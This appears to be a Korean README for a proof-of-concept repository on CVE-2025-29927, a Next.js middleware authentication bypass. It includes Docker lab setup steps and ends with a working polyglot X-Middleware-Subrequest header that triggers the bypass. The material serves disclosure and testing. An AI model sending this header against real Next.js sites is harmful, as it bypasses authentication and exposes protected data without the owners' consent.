
CVE-2025-29927에 대한 PoC: Next.js 미들웨어 우회 취약점. x-middleware-subrequest가 인증 검사를 우회할 수 있는 방법을 보여줍니다. 테스트를 위한 Docker 설정을 포함합니다.
이 저장소는 Next.js의 CVE-2025-29927 취약점을 시연합니다. 이 취약점은 내부 헤더 x-middleware-subrequest를 사용하여 인증과 같은 미들웨어 검사를 우회할 수 있습니다.
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env 파일에서 시크릿 업데이트:NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
다양한 잠재적 사례를 효과적으로 커버할 수 있는 폴리글롯을 사용하여 이 문제의 악용을 크게 단순화할 수 있습니다. 우리는 인증 우회의 존재를 확인하는 데 사용되는 다음 HTTP 헤더를 통해 이를 달성했습니다:
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

